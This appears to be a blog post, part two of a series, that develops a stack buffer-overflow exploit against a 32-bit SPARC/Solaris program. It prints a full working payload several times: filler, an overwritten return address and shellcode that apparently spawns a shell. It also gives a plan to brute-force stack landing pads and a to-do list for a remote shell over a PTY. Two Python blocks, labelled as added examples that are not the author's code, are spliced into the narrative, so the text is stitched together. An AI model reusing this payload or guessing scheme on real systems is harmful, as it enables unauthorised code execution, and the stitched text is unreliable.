Holy Mother of Pearl – Pt. II

Now let’s start perfecting our exploit:

STACK RANGE
0xFFBEE000
.
. 0xFFBEE800
.
. 0xFFBEF000
.
. 0xFFBEF800
.
0xFFBF0000

The above is the typical stack range for a 32-bit SPARC app under a 64-bit kernel; that's as specific as I care to be. We can write a guesser program that, based on the nop-sled size, slices that address space into potential landing pads and runs the vulnerable program once per landing pad until one succeeds.

Thus, this program will have the payload and be able to modify it as it goes.

Given this line:

 ./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload

I have 338 bytes (0x152) of nop-sled goodness. 8192 / 338 = 24.2, call it 24: we can break the stack space into 24 chunks of potential landing zones, one of which will successfully execute the exploit. I'm assuming I get that many attempts anyway..

Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
The 1111 region and fp stay the same between attempts; only ra is changed, and the 2222 region is unchanged too.

I begin crafting my program.

-bash-4.3$ od -t x1 -A n payload
         01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
         01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
         01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
         01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
         01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
         01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
         01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
         02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
         02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
         02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
         02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
         02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
         02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
         03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
         03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
         03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
         03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
         03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
         03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
         03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
         04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
         11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
         d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
         90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
         c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
         82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
         91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g'
 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44
 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48
 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c
 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50
 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54
 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58
 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42
 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46
 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a
 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e
 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52
 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56
 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a
 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44
 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48
 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c
 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50
 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54
 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58
 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42
 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50
 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da
 d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60
 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c
 c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d
 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01
 91 d0 20 08 0a

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g'
\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44
\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48
\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c
\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50
\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54
\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58
\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42
\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46
\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a
\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e
\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52
\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56
\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a
\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44
\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48
\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c
\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50
\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54
\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58
\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42
\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50
\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda
\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60
\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c
\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d
\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01
\x91\xd0\x20\x08\x0a

Continuing further:

-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"
""
-bash-4.3$ od -t x1 -A n payload | sed 's/      //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//'
"\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44"
"\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48"
"\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c"
"\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50"
"\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54"
"\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58"
"\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42"
"\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46"
"\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a"
"\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e"
"\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52"
"\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56"
"\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a"
"\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44"
"\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48"
"\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c"
"\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50"
"\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54"
"\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58"
"\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42"
"\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50"
"\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda"
"\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60"
"\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c"
"\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01"
"\x91\xd0\x20\x08\x0a"

There is one problem: the payload doesn't have a nop sled.
Each SPARC instruction is 4 bytes and must be aligned properly, i.e. word-aligned.
That means I really have 336 bytes to work with: 336 / 4 = 84 nop instructions.
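The arithmetic behind the landing-pad estimate and the word-alignment fix, as an added example (not the post's own code): it rounds the sled down to whole instructions, builds the grid of candidate return addresses across the quoted 0xFFBEE000..0xFFBF0000 range, and patches the 4-byte ra field of a buffer laid out as 1111/fp/ra/2222. The NOP encoding is the xor %g1,%g1,%g0 the post derives with od2sc below; the buffer and the ra offset used in the test are constructed sample values.

```python
import struct

# Values quoted in the post: the 8 KiB stack range and the 338-byte sled.
STACK_LO = 0xFFBEE000
STACK_HI = 0xFFBF0000
SLED_BYTES = 338
# Encoding of xor %g1,%g1,%g0, the NOP the post derives with od2sc.
NOP = b"\x80\x18\x40\x01"


def usable_sled(sled_bytes):
    """Round the sled down to whole 4-byte SPARC instructions (338 -> 336)."""
    return sled_bytes - sled_bytes % 4


def build_sled(sled_bytes):
    """NOP sled of whole instructions: 336 usable bytes give 84 NOPs."""
    return NOP * (usable_sled(sled_bytes) // 4)


def landing_pads(lo, hi, sled_bytes):
    """Candidate return addresses spaced one aligned sled apart.

    Any window of `step` bytes inside [lo, hi) contains exactly one grid
    point, so wherever the sled actually sits, one guess lands inside it.
    The partial last chunk is kept, so the count is ceil((hi - lo) / step),
    one more than the floor-division estimate in the post.
    """
    step = usable_sled(sled_bytes)
    if step < 4:
        raise ValueError("sled must hold at least one instruction")
    return list(range(lo, hi, step))


def patch_return_address(buf, ra_offset, addr):
    """Copy of buf with the 4-byte ra field replaced; 1111, fp and 2222 untouched.

    SPARC is big-endian, which is why the dump above shows the saved
    return address as ff be fe 50 rather than byte-reversed.
    """
    if addr & 3:
        raise ValueError("SPARC return address must be word-aligned")
    out = bytearray(buf)
    out[ra_offset:ra_offset + 4] = struct.pack(">I", addr)
    return bytes(out)
```

With the stack base fixed, the grid has only 25 entries, which is what makes this guessing cheap; a randomized stack base multiplies that search space, and every wrong guess is a crash of the target, which is the noisy signature a monitor can key on.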

I need a nop instruction:

# using the previously developed od2sc from above..

bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin
"\x80\x18\x40\x01"
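The od | sed pipeline above and the od2sc helper do the same job: turn raw payload bytes into C string literals. As an added example that is not the post's od2sc, here is that conversion in Python together with its inverse, which is what a C port of the guesser needs when it embeds the payload; the sample bytes are constructed.

```python
import re

# Constructed samples: the 4-byte NOP encoding and a 20-byte mixed buffer.
SAMPLE_NOP = b"\x80\x18\x40\x01"
SAMPLE_MIXED = b"\x01AAA\x01BBB\x01CCC\x01DDD\xff\xbe\xfe\x50"


def od2sc(data, width=16):
    """Format bytes as C string literals, 16 bytes per line.

    Mirrors the od | sed pipeline above: every byte becomes \\xNN and each
    line is wrapped in double quotes.  Unlike od, there is no trailing
    offset line, so no stray "" line appears (the bug fixed above with
    sed 's/""//').
    """
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        lines.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(lines)


_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")


def sc2bytes(text):
    """Inverse of od2sc: parse adjacent C literals back into bytes.

    Accepts only quoted runs of \\xNN escapes (an empty "" is fine), so an
    unescaped character cannot silently corrupt the payload on the way in.
    """
    out = bytearray()
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if len(line) < 2 or line[0] != '"' or line[-1] != '"':
            raise ValueError("not a C string literal: %r" % line)
        body = line[1:-1]
        if _HEX.sub("", body):
            raise ValueError("unexpected characters in %r" % line)
        out.extend(int(h, 16) for h in _HEX.findall(body))
    return bytes(out)
```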

Although this program doesn't have to be written in C, I am migrating it to C now in anticipation of using it with a raw PTY in the remote exploit later on.. Actually, I just discovered that I can do the following:

bazz@life[pts/6][~/latest] (cat; cat payload cat)
dfd
dfd
AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P
                                                                                                                ؚ�!n�#�T
                                                                                                                       ���#�X
                                                                                                                             Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H�
dfd
dfd
bazz@life[pts/6][~/latest]

After interacting with cat.. I can CTRL-D (not CTRL-C), and then the other program will run.. That's great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn't allow a raw terminal session experience in the remote shell: things like signals or CTRL characters would be interpreted by the local shell in a "cat" session. Thus, I'm going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it! I have tools I can do this in seconds with :) I am running out.. time to call it a night. But before I do, a TO-DO:
1) In the PTY:
   Allocate signals for:
   a) sending the payload
   b) respawning the target process with a new return address in the payload
   Add logic to deallocate the signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can C-ify it later.

TO BE CONTINUED

Posted in Bash, buffer overflow, Sparc/Solaris
